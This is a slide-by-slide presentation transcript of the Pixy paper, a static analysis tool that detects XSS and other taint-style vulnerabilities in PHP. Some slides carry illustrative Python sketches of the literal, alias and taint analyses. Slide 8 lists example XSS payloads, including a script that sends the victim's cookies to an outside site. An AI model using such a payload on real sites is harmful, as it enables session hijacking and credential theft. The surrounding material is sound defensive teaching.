
Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities

Nenad Jovanovic, Christopher Kruegel, Engin Kirda. Secure Systems Lab, Vienna University of Technology. Proceedings of the IEEE Symposium on Security and Privacy (May 2006).





Presentation Transcript


  1. Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities • Nenad Jovanovic, Christopher Kruegel, Engin Kirda • Secure Systems Lab, Vienna University of Technology • Proceedings of the IEEE Symposium on Security and Privacy (May 2006)

  2. Outline • Introduction • Taint-Style Vulnerabilities • Data Flow Analysis • Empirical Results • Conclusions • Comments

  3. Introduction(1/2) • There is an urgent need for automated vulnerability detection in Web application development. • Existing approaches for mitigating threats to Web applications can be divided into client-side and server-side solutions • Server-side solutions: • Static approaches • Scan source code for vulnerabilities • Dynamic approaches • Detect vulnerabilities while executing the audited program

  4. Introduction(2/2) • Pixy • The first open source tool for statically detecting XSS vulnerabilities in PHP4 code by means of data flow analysis • It can be applied to other taint-style vulnerabilities such as SQL injection or command injection • http://pixybox.seclab.tuwien.ac.at/pixy/index.php

  5. Taint-Style Vulnerabilities(1/2) • Of all vulnerabilities in Web applications, problems caused by unchecked input are recognized as the most common • Attackers inject malicious data into Web applications • They then manipulate the applications using that data • The authors refer to this class of vulnerabilities as the tainted object propagation problem • Term referenced from “Finding security errors in Java programs with static analysis,” in Proceedings of the 14th Usenix Security Symposium, Aug. 2005

  6. Taint-Style Vulnerabilities(2/2) • Tainted data • Originates from potentially malicious users • Causes security problems at vulnerable points in the program (called sensitive sinks) • May enter the program at specific places, and can spread via assignments and similar constructs • Can be untainted (sanitized) using a set of operations • Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. • These instances differ only in the concrete values of a few parameters

  7. Cross-Site Scripting (XSS)(1/2) • Occurs when dynamically generated Web pages display improperly validated input • An attacker may embed malicious JavaScript code into dynamically generated pages of trusted sites in order to: • hijack user account credentials • change user settings • steal cookies • insert unwanted content into the page

  8. Cross-Site Scripting (XSS)(2/2) • Reflected Cross-Site Scripting Attacks • Stored Cross-Site Scripting Attacks • An attacker's malicious script is rendered more than once • Example payloads: • <script>alert('Hello World');</script> • <a href="/usercp.php?action=logout">A web page about rabbits</a> • <script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>

  9. Properties of XSS • Entry Points into the program • GET: $_GET • POST: $_POST • COOKIE: $_COOKIE • The number of entry points grows when “register_globals” is active • Sanitization Routines • htmlentities(), htmlspecialchars(), and type casts • Sensitive Sinks • echo() • print() • printf()…
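
The three parameter sets on this slide can be written down as plain data. The following is only an illustrative sketch in Python, not Pixy's actual configuration format: the name `XSS_PARAMETERS` and the helper `sanitize` are hypothetical, and Python's `html.escape` is used as a stand-in for PHP's `htmlspecialchars()`.

```python
import html

# Hypothetical encoding of the slide's three parameter sets for XSS.
XSS_PARAMETERS = {
    "entry_points": {"$_GET", "$_POST", "$_COOKIE"},
    "sanitizers": {"htmlentities", "htmlspecialchars"},
    "sinks": {"echo", "print", "printf"},
}


def sanitize(value: str) -> str:
    """Escape HTML metacharacters; a stand-in for PHP's htmlspecialchars()."""
    return html.escape(value, quote=True)


payload = "<script>alert('Hello World');</script>"
escaped = sanitize(payload)
# After escaping, the text no longer contains a literal <script> tag,
# so a browser would display it instead of executing it.
```

Swapping in a different set of entry points, sanitizers, and sinks is what would turn the same scheme into a description of another taint-style vulnerability such as SQL injection.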

  10. Data Flow Analysis(1/4) • Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized. • Identify the taint value of variables used in these sinks • Statically compute certain information for every single program point (or for coarser units such as functions) • PHP Front-End • Constructs a parse tree for the PHP input file • The parse tree is transformed into a linearized form resembling three-address code (TAC), and kept as a control flow graph for each encountered function • Assembly-like language • At most 3 operands • “x = y op z”
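
To make the “x = y op z” form concrete, here is a minimal sketch in Python that flattens a nested expression into three-address statements. The tuple-based expression format, the temporary names `_t0`, `_t1`, and the function names are assumptions made for illustration; they do not reflect Pixy's internal representation.

```python
from itertools import count


def to_tac(expr, code, temps):
    """Flatten a nested (op, left, right) tuple; return the name holding its value."""
    if isinstance(expr, str):          # a plain variable or literal
        return expr
    op, left, right = expr
    left_name = to_tac(left, code, temps)
    right_name = to_tac(right, code, temps)
    tmp = f"_t{next(temps)}"           # fresh temporary for this sub-expression
    code.append(f"{tmp} = {left_name} {op} {right_name}")
    return tmp


def linearize(target, expr):
    """Return three-address statements that compute `target = expr`."""
    code = []
    result = to_tac(expr, code, count())
    code.append(f"{target} = {result}")
    return code


# $x = $a + $b * $c
tac = linearize("$x", ("+", "$a", ("*", "$b", "$c")))
```

Every emitted statement has at most three operands, which is what lets the later analyses treat each statement as one atomic CFG node.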

  11. Data Flow Analysis(2/4) • Operates on the control flow graph (CFG) of a program • A data structure built on top of the intermediate code representation that abstracts the control flow behavior of the function being compiled • Node: atomic statement of the program • Edge: flow of control

  12. Literal Analysis: Basics • Purpose: To determine, for each program point, the literal that a variable or a constant can hold. • Can improve the precision of the overall analysis by: • Evaluating branch conditions • Ignoring program paths that cannot be executed at runtime (called path pruning) • Resolving non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses) • After performing literal analysis • Each CFG node is associated with information about which literal is mapped to a variable before executing that node

  13. How Data Flow Analysis is Used to Perform Literal Analysis • Assume a fictitious programming language • One variable (v) • Two literals (the integers 3 and 4) • “skip” node • Empty instruction • “Ω” • Unknown literal

  14. Data Flow Analysis(3/4) • Carrier Lattice • Information about the program is represented using values from an algebraic structure • Every piece of information that could ever be associated with a CFG node by the analysis must be contained as an element of the lattice used • Bottom element: “not visited yet” at the beginning • Line: ordering between elements with regard to precision • Least upper bound: the smallest element that is greater than or equal to both elements. Needed by the analysis algorithm

  15. Data Flow Analysis(4/4) • Transfer Function • f: P → P for each node in the control flow graph • Input: a lattice element • Output: a lattice element • Models the effect of the node on the program information • Each CFG node is associated with such a transfer function
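
The fictitious language from slide 13 is small enough to analyze in a few lines. The sketch below, in Python, combines a carrier lattice (bottom, the literals 3 and 4, and Ω), a least upper bound, one transfer function per node, and a worklist iteration. The node encoding, the function names, and the choice of Ω as the value of v on program entry are assumptions made for illustration, not details taken from the slides.

```python
BOTTOM = "bottom"   # node not visited yet
OMEGA = "Ω"         # unknown literal


def lub(a, b):
    """Least upper bound in the lattice bottom < {3, 4} < Ω."""
    if a == BOTTOM:
        return b
    if b == BOTTOM:
        return a
    return a if a == b else OMEGA


def transfer(stmt, value_in):
    """Effect of one CFG node on the literal mapped to v."""
    if stmt == "skip":
        return value_in            # empty instruction: nothing changes
    return stmt[1]                 # ("assign", literal): v is overwritten


def analyze(nodes, edges, entry):
    """Worklist iteration; returns the literal of v before each node."""
    before = {n: BOTTOM for n in nodes}
    before[entry] = OMEGA          # assumption: v is unknown on entry
    worklist = [entry]
    while worklist:
        n = worklist.pop()
        out = transfer(nodes[n], before[n])
        for succ in edges.get(n, []):
            merged = lub(before[succ], out)
            if merged != before[succ]:
                before[succ] = merged
                worklist.append(succ)
    return before


# if (...) { v = 3 } else { v = 4 }; skip
nodes = {"cond": "skip", "then": ("assign", 3), "else": ("assign", 4), "exit": "skip"}
edges = {"cond": ["then", "else"], "then": ["exit"], "else": ["exit"]}
result = analyze(nodes, edges, "cond")
```

In this example the two branches disagree, so the information before the final `skip` is Ω; if both branches assigned 3, the least upper bound would keep the literal 3.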

  16. Literal Analysis: Basics • Carrier Lattice Definition • Provides mappings for all variables and constants that appear in the scanned program • Able to describe the mapping to any possible literal (infinite)

  17. Literal Analysis: Basics • Transfer Function Definition • PHP has no explicit type declarations, so a variable may turn out to be a “hidden” array

  18. Four cases in order of increasing complexity 1. Not an array element and not known as array • strong update 2. An array, but not an array element • Array tree 3. Element without non-literal indices (may be an array) • strong overlap

  19. Four cases in order of increasing complexity 4. An array element with non-literal indices and maybe an array • weak overlap algorithm: all overwrite operations are replaced by least upper bound operations • Array elements with one or more non-literal indices are permanently mapped to Ω
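
The difference between overwriting and merging can be sketched as follows in Python. The flat dictionary keyed by strings such as `"$a[1]"` and the function names are hypothetical simplifications; the slides describe an array tree, which is not modeled here.

```python
OMEGA = "Ω"  # unknown literal


def lub(a, b):
    """Least upper bound of two literals: equal values stay, others become Ω."""
    return a if a == b else OMEGA


def strong_update(env, var, literal):
    """The target is known exactly, so its old value is overwritten."""
    new_env = dict(env)
    new_env[var] = literal
    return new_env


def weak_update(env, candidates, literal):
    """The target is one of several candidates, so each candidate keeps its
    old value merged with the new one instead of being overwritten."""
    new_env = dict(env)
    for var in candidates:
        new_env[var] = lub(env.get(var, OMEGA), literal)
    return new_env


env = {"$a[1]": 7, "$a[2]": 8}
after_strong = strong_update(env, "$a[1]", 8)          # $a[1] = 8
after_weak = weak_update(env, ["$a[1]", "$a[2]"], 8)   # $a[$i] = 8, $i unknown
```

With the weak variant, `$a[1]` becomes Ω because it may or may not have been written, while `$a[2]` stays 8 because both possibilities agree.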

  20. Alias Analysis • Ignoring alias relationships would prevent literal analysis from producing correct results in a number of cases. • Without alias analysis, literal analysis cannot determine that an assignment to $a also affects $b • The value recorded for $b would remain unchanged and therefore be incorrect

  21. Carrier Lattice Definition • Alias group: a group of variables referencing the same memory location • Alias information is modeled through sets of alias group sets • (…): an alias group • {…}: an alias group set • Must-aliases of a variable • “{(a,b) (c)}” $b: must-alias of $a • May-aliases of a variable • “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a • The order among lattice elements is defined as subset inclusion
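
The two examples on this slide can be reproduced with nested frozensets. This Python sketch is one possible reading of the notation, assuming a must-alias shares a group with the variable in every alias group set and a may-alias does so in only some of them; the helper names are hypothetical.

```python
def group_set(*groups):
    """Build one alias group set, e.g. group_set("ab", "c") for {(a,b) (c)}."""
    return frozenset(frozenset(g) for g in groups)


def _partners(element, var):
    """For each alias group set, the variables grouped together with var."""
    return [
        set().union(*(g for g in gs if var in g)) - {var}
        for gs in element
    ]


def must_aliases(element, var):
    """Variables that share a group with var in every alias group set."""
    partners = _partners(element, var)
    return set.intersection(*partners) if partners else set()


def may_aliases(element, var):
    """Variables that share a group with var in some, but not all, sets."""
    partners = _partners(element, var)
    return set().union(*partners) - must_aliases(element, var)


one_path = frozenset({group_set("ab", "c")})
two_paths = frozenset({group_set("ab", "c"), group_set("ac", "b")})
```

Because a lattice element is a set of alias group sets, the ordering by subset inclusion maps directly onto Python's `<=` on frozensets: here `one_path <= two_paths` holds.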

  22. Static analysis is not able to decide which path the program will take • Under the assumption that the condition is determined by dynamic factors • Environment variables, user input

  23. Transfer Function Definition • Reference assignment • “$a = & $b” • Unset node • The variable receives its own one-element alias group in each alias group set • Global node • Equally named variable from the global scope on the right side • “global $a;” • The authors only consider references to simple variables
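
The reference assignment and unset nodes can be sketched as operations on a single alias group set, applied to every alias group set of a lattice element. This Python sketch assumes that every variable already appears in some group; the function names are hypothetical and the global node is not modeled.

```python
def unset(group_set, var):
    """`unset($var)`: var leaves its group and forms a one-element group."""
    rest = {g - {var} for g in group_set}
    rest.discard(frozenset())              # drop a group that became empty
    return frozenset(rest | {frozenset({var})})


def reference_assign(group_set, left, right):
    """`$left = &$right`: left is detached, then joins right's group."""
    if left == right:
        return frozenset(group_set)
    detached = unset(group_set, left) - {frozenset({left})}
    return frozenset(g | {left} if right in g else g for g in detached)


def apply_to_element(element, transfer, *args):
    """Apply a transfer function to each alias group set of an element."""
    return frozenset(transfer(gs, *args) for gs in element)


start = frozenset({frozenset("a"), frozenset("b"), frozenset("c")})  # {(a) (b) (c)}
after = reference_assign(start, "a", "b")                             # $a = &$b
```

Starting from {(a) (b) (c)}, the assignment yields {(a,b) (c)}, and a subsequent `unset($a)` returns to the starting point.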

  24. Literal Analysis Revisited • Here we only consider references to simple variables • Functions built into PHP are conservatively modeled as returning Ω, since the gain in precision from modeling them exactly is expected to be rather small • The only built-in function modeled precisely is “define”

  25. Literal Analysis Revisited • The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value • On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.

  26. Taint Analysis • Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant. • Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities

  27. Taint Analysis • Carrier Lattice Definition • Tainted: a variable is tainted if it can hold a malicious, not yet sanitized (checked) value originating from user input • Variables are not mapped to literals or Ω but to the taint values tainted and untainted • Mapped to tainted: this variable might be tainted. • Mapped to untainted: this variable is untainted. • Whenever the analysis cannot determine the taint value, the variable is conservatively assumed to be tainted
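
A two-valued taint lattice is easy to write down. The Python sketch below assumes the ordering untainted < tainted, so that the least upper bound is tainted whenever either input is; the function names and the dictionary-based environment are hypothetical.

```python
UNTAINTED, TAINTED = "untainted", "tainted"


def lub(a, b):
    """Least upper bound: tainted wins, assuming untainted < tainted."""
    return TAINTED if TAINTED in (a, b) else UNTAINTED


def merge(env_a, env_b):
    """Merge the taint mappings of two branches that meet in the CFG.

    A variable missing from one branch is conservatively treated as tainted.
    """
    return {
        var: lub(env_a.get(var, TAINTED), env_b.get(var, TAINTED))
        for var in env_a.keys() | env_b.keys()
    }


then_branch = {"$x": UNTAINTED, "$y": UNTAINTED}
else_branch = {"$x": TAINTED}
merged = merge(then_branch, else_branch)
```

Here `$x` is tainted after the merge because one branch taints it, and `$y` is tainted because nothing is known about it on the other branch.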

  28. Taint Analysis • Transfer Functions Definition • Casting a tainted variable to an integer untaints it • (with unary operators such as +, -, and (int)) • Correctly modeling built-in PHP functions can reduce the number of false positives • Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax • “htmlentities” and “array” return $_UNTAINTED

  29. Taint Analysis • Using the Analysis Results • Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward. • The analysis information for each sensitive sink is searched for tainted input variables • A warning message indicating the corresponding line is issued if such a violation is discovered
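
The step from taint information to warnings can be sketched on a straight-line program. This Python example is a simplified illustration, not Pixy's algorithm: the tuple-based statement format and the function names are hypothetical, there is no control flow or alias handling, and unknown functions are assumed to return a tainted value whenever any argument is tainted.

```python
ENTRY_POINTS = {"$_GET", "$_POST", "$_COOKIE"}
SANITIZERS = {"htmlentities", "htmlspecialchars"}


def is_tainted(name, tainted):
    """Entry points are tainted; unknown variables are assumed tainted."""
    return name in ENTRY_POINTS or tainted.get(name, True)


def find_warnings(program):
    """Propagate taint through the statements and report tainted sink inputs."""
    tainted = {}       # variable name -> True if possibly tainted
    warnings = []
    for line, stmt in enumerate(program, start=1):
        kind = stmt[0]
        if kind == "assign":                 # target = f(sources)
            _, target, sources = stmt
            tainted[target] = any(is_tainted(s, tainted) for s in sources)
        elif kind == "call":                 # target = func(args)
            _, target, func, args = stmt
            if func in SANITIZERS:
                tainted[target] = False      # sanitizers return untainted data
            else:
                tainted[target] = any(is_tainted(a, tainted) for a in args)
        elif kind == "sink":                 # func(args) is a sensitive sink
            _, func, args = stmt
            bad = [a for a in args if is_tainted(a, tainted)]
            if bad:
                warnings.append(
                    f"line {line}: tainted {', '.join(bad)} reaches {func}()"
                )
    return warnings


program = [
    ("assign", "$name", ["$_GET"]),                   # $name = $_GET['name'];
    ("call", "$safe", "htmlentities", ["$name"]),     # $safe = htmlentities($name);
    ("sink", "echo", ["$safe"]),                      # echo $safe;
    ("sink", "echo", ["$name"]),                      # echo $name;
]
warnings = find_warnings(program)
```

Only the second `echo` is reported, because its argument never passed through a sanitization routine.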

  30. Limitations • Pixy does not support object-oriented features of PHP. • Such constructs are treated optimistically: malicious data is assumed never to arise from them. • Files included with “include” and similar keywords are not scanned automatically • The authors frequently observed false positives stemming from these missing file inclusions • These were eliminated through manual inclusion

  31. Empirical Results

  32. Empirical Results

  33. Conclusions • A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities • Additional literal analysis and alias analysis to improve the correctness and precision of taint analysis • Pixy, an open-source Java tool that implements these analysis techniques • Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate

  34. Comments • The first to perform alias analysis for an untyped, reference-based scripting language such as PHP • Beyond the scope of the paper • Recursive calls that depend on dynamic information • Infinite call depth for non-terminating programs • The implementation is widely used by the public. • Future work • Automatic inclusion of “include” files
